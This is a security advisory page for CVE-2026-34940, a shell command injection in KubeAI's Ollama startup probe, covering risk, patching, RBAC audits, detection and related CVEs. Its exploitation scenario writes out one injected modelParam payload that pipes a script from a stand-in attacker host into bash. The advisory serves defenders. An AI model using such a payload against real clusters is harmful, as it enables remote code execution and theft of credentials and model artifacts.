CVE-2026-34940: KubeAI: RCE via shell injection in Ollama startup probe
HIGH CISA: ATTENDKubeAI's ollamaStartupProbeScript() function constructs bash commands using unsanitized model URL parameters (ref, modelParam), enabling OS command injection (CWE-78) that Kubernetes executes as a startup probe inside model server pods. Any principal with RBAC permissions to create or modify Model custom resources can run arbitrary commands in your LLM inference pods — potentially exposing model weights, API credentials, and internal cluster network access. While no public exploit exists and CISA KEV status is negative, this is a straightforward OS command injection requiring minimal skill once cluster-level access to Model CRDs is obtained. Upgrade to KubeAI 0.23.2 immediately; as interim mitigation, tightly restrict RBAC for the Model custom resource (create/update/patch verbs) to trusted operators only.
What is the risk?
Effective risk is HIGH despite the absent CVSS score. CWE-78 OS command injection executed via bash -c inside Kubernetes pods is inherently critical when reachable. The attack surface is gated behind Kubernetes RBAC for Model custom resources, reducing external exposure but not insider or post-compromise threat actor risk. In multi-tenant clusters, over-permissive CI/CD service accounts, or environments where users can submit model definitions, this becomes trivially exploitable. RCE inside model serving pods directly threatens confidentiality of LLM inference infrastructure. Any automated pipeline that processes external model URLs into Model CRDs dramatically expands the blast radius.
How severe is it?
What is the attack surface?
What should I do?
5 steps-
PATCH
Upgrade KubeAI to 0.23.2 — the fix sanitizes model URL components before shell command construction.
-
RBAC AUDIT
Restrict Kubernetes RBAC on Model custom resources immediately — deny create/update/patch to all principals except trusted operators. Run: kubectl get rolebindings,clusterrolebindings -A -o json | grep -i model to surface over-permissive bindings.
-
REVIEW
Audit existing Model CRDs for suspicious injected values in ref/modelParam fields: kubectl get models -A -o yaml | grep -E '(ref|modelParam)' and inspect for shell metacharacters (;, |, $, backticks).
-
DETECT
Monitor model server pods for unexpected child processes spawned from startup probes using Falco or similar runtime security tools.
-
HARDEN
Apply Pod Security Standards (restricted profile) and NetworkPolicies to model serving namespaces to limit blast radius if exploitation occurs.
What does CISA's SSVC say?
Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.
How is it classified?
Which compliance frameworks are affected?
This CVE is relevant to:
Frequently Asked Questions
What is CVE-2026-34940?
KubeAI's ollamaStartupProbeScript() function constructs bash commands using unsanitized model URL parameters (ref, modelParam), enabling OS command injection (CWE-78) that Kubernetes executes as a startup probe inside model server pods. Any principal with RBAC permissions to create or modify Model custom resources can run arbitrary commands in your LLM inference pods — potentially exposing model weights, API credentials, and internal cluster network access. While no public exploit exists and CISA KEV status is negative, this is a straightforward OS command injection requiring minimal skill once cluster-level access to Model CRDs is obtained. Upgrade to KubeAI 0.23.2 immediately; as interim mitigation, tightly restrict RBAC for the Model custom resource (create/update/patch verbs) to trusted operators only.
Is CVE-2026-34940 actively exploited?
No confirmed active exploitation of CVE-2026-34940 has been reported, but organizations should still patch proactively.
How to fix CVE-2026-34940?
1. PATCH: Upgrade KubeAI to 0.23.2 — the fix sanitizes model URL components before shell command construction. 2. RBAC AUDIT: Restrict Kubernetes RBAC on Model custom resources immediately — deny create/update/patch to all principals except trusted operators. Run: kubectl get rolebindings,clusterrolebindings -A -o json | grep -i model to surface over-permissive bindings. 3. REVIEW: Audit existing Model CRDs for suspicious injected values in ref/modelParam fields: kubectl get models -A -o yaml | grep -E '(ref|modelParam)' and inspect for shell metacharacters (;, |, $, backticks). 4. DETECT: Monitor model server pods for unexpected child processes spawned from startup probes using Falco or similar runtime security tools. 5. HARDEN: Apply Pod Security Standards (restricted profile) and NetworkPolicies to model serving namespaces to limit blast radius if exploitation occurs.
What systems are affected by CVE-2026-34940?
This vulnerability affects the following AI/ML architecture patterns: model serving, Kubernetes-based AI deployments, LLM inference infrastructure, MLOps pipelines.
What is the CVSS score for CVE-2026-34940?
CVE-2026-34940 has a CVSS v3.1 base score of 8.8 (HIGH). The EPSS exploitation probability is 0.45%.
What is the AI security impact?
Affected AI Architectures
MITRE ATLAS Techniques
AML.T0012 Valid Accounts AML.T0049 Exploit Public-Facing Application AML.T0050 Command and Scripting Interpreter Compliance Controls Affected
What are the technical details?
Original Advisory
KubeAI is an AI inference operator for kubernetes. Prior to 0.23.2, the ollamaStartupProbeScript() function in internal/modelcontroller/engine_ollama.go constructs a shell command string using fmt.Sprintf with unsanitized model URL components (ref, modelParam). This shell command is executed via bash -c as a Kubernetes startup probe. An attacker who can create or update Model custom resources can inject arbitrary shell commands that execute inside model server pods. This vulnerability is fixed in 0.23.2.
Exploitation Scenario
An attacker holding Kubernetes credentials that allow Model CRD updates — obtained via a compromised CI/CD service account, misconfigured RBAC, or insider access — crafts a Model resource with a malicious modelParam field such as 'llama3; curl http://attacker.com/implant.sh | bash; echo '. When KubeAI's controller processes this resource, ollamaStartupProbeScript() interpolates the unsanitized value into a bash -c command that Kubernetes executes as the pod startup probe. The injected commands run inside the model server container with the pod's service account privileges, enabling the attacker to exfiltrate Hugging Face tokens, cloud provider credentials, or model artifacts, pivot to other cluster services via the internal network, or establish persistence inside the inference infrastructure for long-term access.
Weaknesses (CWE)
CWE-78 — Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'): The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.
- [Architecture and Design] If at all possible, use library calls rather than external processes to recreate the desired functionality.
- [Architecture and Design, Operation] Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software. OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations. This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise. Be careful to avoid CWE-243 and other weaknesses related to jails.
Source: MITRE CWE corpus.
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H Timeline
Related Vulnerabilities
CVE-2024-2912 10.0 BentoML: RCE via insecure deserialization (CVSS 10)
Same attack type: Code Execution CVE-2026-21858 10.0 n8n: Input Validation flaw enables exploitation
Same attack type: Code Execution CVE-2025-5120 10.0 smolagents: sandbox escape enables unauthenticated RCE
Same attack type: Code Execution CVE-2025-59528 10.0 Flowise: Unauthenticated RCE via MCP config injection
Same attack type: Code Execution GHSA-vvpj-8cmc-gx39 10.0 picklescan: security flaw enables exploitation
Same attack type: Code Execution